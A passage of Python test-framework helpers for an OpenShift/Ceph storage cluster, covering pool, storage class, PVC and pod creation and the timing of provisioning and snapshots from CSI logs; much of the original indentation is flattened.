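#   proj = create_project()
#   pvc_obj = create_pvc(
#       sc_name="ocs-storagecluster-ceph-rbd",  # placeholder SC name
#       namespace=proj.namespace,
#       size="5Gi",
#   )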
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(constants.CSI_RBD_SECRET_YAML)
secret_data["stringData"]["userID"] = constants.ADMIN_USER
secret_data["stringData"]["userKey"] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(constants.CSI_CEPHFS_SECRET_YAML)
del secret_data["stringData"]["userID"]
del secret_data["stringData"]["userKey"]
secret_data["stringData"]["adminID"] = constants.ADMIN_USER
secret_data["stringData"]["adminKey"] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data["metadata"]["name"] = create_unique_resource_name(
f"test-{interface}", "secret"
)
secret_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get("parameters").get("pool")
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(
pool_name=None, replica=3, compression=None, failure_domain=None, verify=True
):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
replica (int): The replica size for a pool
compression (str): Compression type for a pool
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cbp")
)
cbp_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data["spec"]["replicated"]["size"] = replica
cbp_data["spec"]["failureDomain"] = failure_domain or get_failure_domin()
if compression:
cbp_data["spec"]["parameters"]["compression_mode"] = compression
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(
cbp_obj.name
), f"Block pool {cbp_obj.name} does not exist"
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cfs")
)
cfs_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(
cfs_data.name
), f"File system {cfs_data.name} does not exist"
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(kind="storageclass", resource_name=resource_name)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def default_thick_storage_class():
"""
Return default RBD thick storage class
Returns:
OCS: Existing RBD thick StorageClass instance
"""
external = config.DEPLOYMENT["external_mode"]
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD_THICK
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD_THICK
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type,
interface_name,
secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
sc_name=None,
provisioner=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface_type is CephBlockPool
encrypted (bool): True to create encrypted SC else False
encryption_kms_id (str): ID of the KMS entry from connection details
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(constants.CSI_RBD_STORAGECLASS_YAML)
sc_data["parameters"]["csi.storage.k8s.io/node-stage-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/node-stage-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data["provisioner"] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
if rbd_thick_provision:
sc_data["parameters"]["thickProvision"] = "true"
if encrypted:
# Avoid circular imports
from ocs_ci.utility.kms import get_encryption_kmsid
sc_data["parameters"]["encrypted"] = "true"
sc_data["parameters"]["encryptionKMSID"] = (
encryption_kms_id if encryption_kms_id else get_encryption_kmsid()[0]
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(constants.CSI_CEPHFS_STORAGECLASS_YAML)
sc_data["parameters"]["csi.storage.k8s.io/node-stage-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/node-stage-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data["parameters"]["fsName"] = get_cephfs_name()
sc_data["provisioner"] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data["parameters"]["pool"] = interface_name
sc_data["metadata"]["name"] = (
sc_name
if sc_name
else create_unique_resource_name(f"test-{interface}", "storageclass")
)
sc_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["csi.storage.k8s.io/provisioner-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/provisioner-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"][
"csi.storage.k8s.io/controller-expand-secret-name"
] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/controller-expand-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["clusterID"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["reclaimPolicy"] = reclaim_policy
try:
del sc_data["parameters"]["userid"]
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name,
pvc_name=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None,
do_reload=True,
access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None,
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
        do_reload (bool): True to wait for the PVC to be reloaded after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["name"] = (
pvc_name if pvc_name else create_unique_resource_name("test", "pvc")
)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if volume_mode:
pvc_data["spec"]["volumeMode"] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
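# Illustrative sketch (editor's addition): requesting a raw block RWX PVC from an
# RBD storage class; the SC and namespace names are placeholders.
#
#   block_pvc = create_pvc(
#       sc_name="ocs-storagecluster-ceph-rbd",  # placeholder SC name
#       namespace="my-test-namespace",          # placeholder namespace
#       size="10Gi",
#       access_mode=constants.ACCESS_MODE_RWX,
#       volume_mode="Block",
#   )
#   wait_for_resource_state(block_pvc, "Bound", timeout=90)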
def create_multiple_pvcs(
sc_name,
namespace,
number_of_pvc=1,
size=None,
do_reload=False,
access_mode=constants.ACCESS_MODE_RWO,
burst=False,
):
"""
Create one or more PVC as a bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
        do_reload (bool): True to wait for the PVC to be reloaded after its
            creation, False otherwise
        access_mode (str): The kind of access mode for PVC
        burst (bool): True for bulk creation, False (default) for one-by-one creation
    Returns:
        ocs_objs (list): List of PVC objects
        tmpdir (str): The full path of the directory holding the PVC yaml files.
            Returned only when burst is True
"""
if not burst:
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
volume_mode = "Block"
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name,
size=size,
namespace=namespace,
do_reload=do_reload,
access_mode=access_mode,
volume_mode=volume_mode,
)
for _ in range(number_of_pvc)
]
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
pvc_data["spec"]["volumeMode"] = "Block"
else:
pvc_data["spec"]["volumeMode"] = None
    # Creating a temp directory to hold the yaml files for the bulk PVC creation
tmpdir = tempfile.mkdtemp()
logger.info("Creating the PVC yaml files for creation in bulk")
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name("test", "pvc")
logger.info(f"Adding PVC with name {name}")
pvc_data["metadata"]["name"] = name
templating.dump_data_to_temp_yaml(pvc_data, f"{tmpdir}/{name}.yaml")
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info("Creating all PVCs as bulk")
oc = OCP(kind="pod", namespace=namespace)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
    # Allow the system 1 sec per PVC to create.
    # This will prevent any other command from running in the system during
    # this period of time.
    logger.info(
        f"Going to sleep for {number_of_pvc} sec. "
        "before starting to verify that the PVCs were created."
)
time.sleep(number_of_pvc)
return ocs_objs, tmpdir
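# Illustrative sketch (editor's addition) of the two return shapes of
# create_multiple_pvcs; the storage class and namespace names are placeholders.
#
#   # One-by-one creation returns only the list of PVC objects:
#   pvc_objs = create_multiple_pvcs(
#       sc_name="ocs-storagecluster-cephfs", namespace="my-ns", number_of_pvc=5, size="2Gi"
#   )
#   # Bulk (burst) creation also returns the temp dir holding the yaml files,
#   # which can later be passed to delete_bulk_pvcs():
#   pvc_objs, yaml_dir = create_multiple_pvcs(
#       sc_name="ocs-storagecluster-cephfs", namespace="my-ns",
#       number_of_pvc=50, size="2Gi", burst=True,
#   )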
def delete_bulk_pvcs(pvc_yaml_dir, pv_names_list):
"""
Deletes all the pvcs created from yaml file in a provided dir
Args:
pvc_yaml_dir (str): Directory in which yaml file resides
        pv_names_list (list): List of PV names to be deleted
"""
oc = OCP(kind="pod", namespace=defaults.ROOK_CLUSTER_NAMESPACE)
cmd = f"delete -f {pvc_yaml_dir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
time.sleep(len(pv_names_list) / 2)
for pv_name in pv_names_list:
validate_pv_delete(pv_name)
def verify_block_pool_exists(pool_name):
"""
    Verify if a Ceph block pool exists
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph osd lspools"):
logger.info(f"POOLS are {pools}")
for pool in pools:
if pool_name in pool.get("poolname"):
return True
except TimeoutExpiredError:
return False
def get_pool_cr(pool_name):
"""
Get the pool CR even if the kind is unknown.
Args:
pool_name (str): The name of the pool to get the CR for.
Returns:
dict: If the resource is found, None otherwise.
"""
logger.info(f"Checking if pool {pool_name} is kind of {constants.CEPHBLOCKPOOL}")
ocp_kind_cephblockpool = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=config.ENV_DATA["cluster_namespace"]
)
pool_cr = ocp_kind_cephblockpool.get(resource_name=pool_name, dont_raise=True)
if pool_cr is not None:
return pool_cr
else:
        logger.info(
            f"Pool {pool_name} is not kind={constants.CEPHBLOCKPOOL}"
            f", checking if it is kind={constants.CEPHFILESYSTEM}"
        )
ocp_kind_cephfilesystem = ocp.OCP(
kind="CephFilesystem",
namespace=config.ENV_DATA["cluster_namespace"],
)
pool_cr = ocp_kind_cephfilesystem.get(resource_name=pool_name, dont_raise=True)
return pool_cr
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph auth get-key client.admin")
return out["key"]
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph fs ls")
return out[0]["data_pools"][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
        bool: True if the CephFileSystem is present on both the Ceph and OCP
            side, False otherwise (the failure cause is logged)
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get("metadata").get("name"):
        logger.info("Filesystem %s was created on the OpenShift side", fs_name)
ocp_validate = True
else:
        logger.info("Filesystem %s was not created on the OpenShift side", fs_name)
return False
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph fs ls"):
for out in pools:
result = out.get("name")
if result == fs_name:
                    logger.info("FileSystem %s was created on the Ceph side", fs_name)
ceph_validate = True
break
else:
                logger.error("FileSystem %s is not present on the Ceph side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
    return ceph_validate and ocp_validate
def create_ocs_object_from_kind_and_name(
kind, resource_name, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
):
"""
Create OCS object from kind and name
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
        namespace (str): The namespace of the resource.
Returns:
ocs_ci.ocs.resources.ocs.OCS (obj): returns OCS object from kind and name.
"""
ocp_object = OCP(kind=kind, resource_name=resource_name, namespace=namespace).get()
return OCS(**ocp_object)
def remove_ocs_object_from_list(kind, resource_name, object_list):
"""
Given a list of OCS objects, the function removes the object with kind and resource from the list
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
        object_list (list): List of OCS objects.
    Returns:
        list: List of OCS objects without the removed object.
"""
for obj in object_list:
if obj.name == resource_name and obj.kind == kind:
object_list.remove(obj)
return object_list
def get_all_storageclass_names():
"""
    Function for getting all storageclass names
    Returns:
        list: list of storageclass names
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result["items"]
storageclass = [
item.get("metadata").get("name")
for item in sample
if (
(item.get("metadata").get("name") not in constants.IGNORE_SC_GP2)
and (item.get("metadata").get("name") not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
    """
    Function for deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
    Function for getting all CephBlockPools
    Returns:
        list: list of cephblockpool names
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result["items"]
pool_list = [item.get("metadata").get("name") for item in sample]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
    Function to retrieve the CephFS name
    Returns:
        str: Name of the CephFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd("ceph fs ls")
return result[0]["name"]
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(node.get_worker_nodes())
for node_obj in node_objs:
        logging.info(f'pulling image "{image_name}" on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f"podman pull {image_name}"]
)
def run_io_with_rados_bench(**kw):
"""
    A task for radosbench. Runs the radosbench command on the specified pod. If
    parameters are not provided, the task assumes a few default parameters. This
    task runs the command in a synchronous fashion.
Args:
kw (dict): a dictionary of various radosbench parameters.
ex::
pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get("ceph_pods") # list of pod objects of ceph cluster
config = kw.get("config")
role = config.get("role", "client")
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get("idx", 0)
client = clients[idx]
op = config.get("op", "write")
cleanup = ["--no-cleanup", "--cleanup"][config.get("cleanup", True)]
pool = config.get("pool")
block = str(config.get("size", 4 << 20))
time = config.get("time", 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
    Gets all PVs in the openshift-storage namespace
    Returns:
        dict: Dict of all PVs in the openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
    Validates whether the PV is deleted after PVC deletion
    Args:
        pv_name (str): Name of the PV (from the PVC) to validate
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(
pvc_objs, pod_factory, interface, pods_for_rwx=1, status="", nodes=None
):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
nodes (list): Node name for each pod will be selected from this list.
Returns:
list: list of Pod objects
"""
pod_objs = []
nodes_iter = cycle(nodes) if nodes else None
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, "volume_mode", pvc_obj.get()["spec"]["volumeMode"]
)
access_mode = getattr(pvc_obj, "access_mode", pvc_obj.get_pvc_access_mode)
if volume_mode == "Block":
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ""
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [
pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
for _ in range(1, pods_for_rwx)
]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image="quay.io/ocsci/fedora",
source_image_label="latest",
):
"""
Allows to create a build config using a Dockerfile specified as an
argument, eg.::
$ oc new-build -D $'FROM centos:7\\nRUN yum install -y httpd'
creates a build with ``httpd`` installed.
Args:
image_name (str): Name of the image to be created
        source_image (str): Source image to build the docker image from,
            defaults to a Fedora base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
defaults to 'latest'
install_package (str): package to install over the base image
Returns:
ocs_ci.ocs.ocp.OCP (obj): The OCP object for the image
    Raises:
        UnavailableBuildException: If build creation fails
"""
base_image = source_image + ":" + source_image_label
if config.DEPLOYMENT.get("disconnected"):
base_image = mirror_image(image=base_image)
cmd = f"yum install -y {install_package}"
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = f"FROM {base_image}\n " f" RUN {cmd}\n" f"CMD tail -f /dev/null"
command = f"new-build -D $'{docker_file}' --name={image_name}"
kubeconfig = os.getenv("KUBECONFIG")
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f"Running command {oc_cmd}")
result = run(oc_cmd, stdout=PIPE, stderr=PIPE, timeout=15, shell=True)
if result.stderr.decode():
raise UnavailableBuildException(
f"Build creation failed with error: {result.stderr.decode()}"
)
out = result.stdout.decode()
logger.info(out)
if "Success" in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind="Pod", resource_name=image_name)
if pod_obj.wait_for_resource(
condition="Completed",
resource_name=f"{image_name}" + "-1-build",
timeout=300,
sleep=30,
):
logger.info(f"build {image_name} ready")
set_image_lookup(image_name)
logger.info(f"image {image_name} can now be consumed")
image_stream_obj = OCP(kind="ImageStream", resource_name=image_name)
return image_stream_obj
else:
raise UnavailableBuildException("Build creation failed")
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example::
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind="ImageStream")
command = f"set image-lookup {image_name}"
    logger.info(f'image lookup for image "{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_snapshot_time(interface, snap_name, status):
"""
    Get the starting/ending creation time of a snapshot based on CSI logs
The time and date extraction code below has been modified to read
the month and day data in the logs. This fixes an error where negative
time values are calculated when test runs cross midnight. Also, previous
calculations would not set the year, and so the calculations were done
as if the year were 1900. This is not a problem except that 1900 was
not a leap year and so the next February 29th would throw ValueErrors
for the whole day. To avoid this problem, changes were made to also
include the current year.
Incorrect times will still be given for tests that cross over from
December 31 to January 1.
Args:
        interface (str): The interface backed the snapshot's parent PVC
        snap_name (str / list): Name of the snapshot(s) for creation time
            measurement; a list will be a list of snapshot objects
        status (str): the status that we want to get - Start / End
    Returns:
        datetime object: Time of snapshot(s) creation
"""
def get_pattern_time(log, snapname, pattern):
"""
Get the time of pattern in the log
Args:
log (list): list of all lines in the log file
snapname (str): the name of the snapshot
            pattern (str): the pattern that needs to be found in the log (start / bound)
        Returns:
            str: the pattern's timestamp string from the log, or None if not found
"""
this_year = str(datetime.datetime.now().year)
for line in log:
if re.search(snapname, line) and re.search(pattern, line):
mon_day = " ".join(line.split(" ")[0:2])
return f"{this_year} {mon_day}"
return None
logs = ""
# the starting and ending time are taken from different logs,
# the start creation time is taken from the snapshot controller, while
# the end creation time is taken from the csi snapshot driver
if status.lower() == "start":
pattern = "Creating content for snapshot"
        # Get the snapshot-controller pod
pod_name = pod.get_csi_snapshoter_pod()
logs = pod.get_pod_logs(
pod_name, namespace="openshift-cluster-storage-operator"
)
elif status.lower() == "end":
pattern = "readyToUse true"
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
else:
logger.error(f"the status {status} is invalid.")
return None
logs = logs.split("\n")
stat = None
# Extract the time for the one PVC snapshot provisioning
if isinstance(snap_name, str):
stat = get_pattern_time(logs, snap_name, pattern)
# Extract the time for the list of PVCs snapshot provisioning
if isinstance(snap_name, list):
all_stats = []
for snapname in snap_name:
all_stats.append(get_pattern_time(logs, snapname.name, pattern))
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
if stat:
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
else:
return None
def measure_snapshot_creation_time(interface, snap_name, snap_con_name, snap_uid=None):
"""
Measure Snapshot creation time based on logs
Args:
        interface (str): The interface backed the snapshot's parent PVC
        snap_name (str): Name of the snapshot for creation time measurement
        snap_con_name (str): Name of the snapshot content, used to find the end time
        snap_uid (str): UID of the snapshot, used when parsing the newer (4.8+) log format
Returns:
float: Creation time for the snapshot
"""
start = get_snapshot_time(interface, snap_name, status="start")
end = get_snapshot_time(interface, snap_con_name, status="end")
logs = ""
if start and end:
total = end - start
return total.total_seconds()
else:
        # In 4.8 the log messages were changed, so different parsing is needed
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logger.info(f"Read logs from {log_pod}")
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
logs = logs.split("\n")
pattern = "CSI CreateSnapshot: snapshot-"
for line in logs:
if (
re.search(snap_uid, line)
and re.search(pattern, line)
and re.search("readyToUse \\[true\\]", line)
):
                # The creation time in the log is in nanoseconds, so it needs to be converted to seconds.
results = int(line.split()[-5].split(":")[1].replace("]", "")) * (
10 ** -9
)
return float(f"{results:.3f}")
return None
def get_provision_time(interface, pvc_name, status="start"):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the status that need to retrieve
operation = "started"
if status.lower() == "end":
operation = "succeeded"
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for i in range(0, len(pvc_name)):
name = pvc_name[i].name
stat = [i for i in logs if re.search(f"provision.*{name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
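# Illustrative sketch (editor's addition): measuring bulk provisioning time with
# get_provision_time; `pvc_objs` is a placeholder list of PVC objects.
#
#   start = get_provision_time(constants.CEPHBLOCKPOOL, pvc_objs, status="start")
#   end = get_provision_time(constants.CEPHBLOCKPOOL, pvc_objs, status="end")
#   logger.info(f"Bulk provisioning took {(end - start).total_seconds()} seconds")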
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
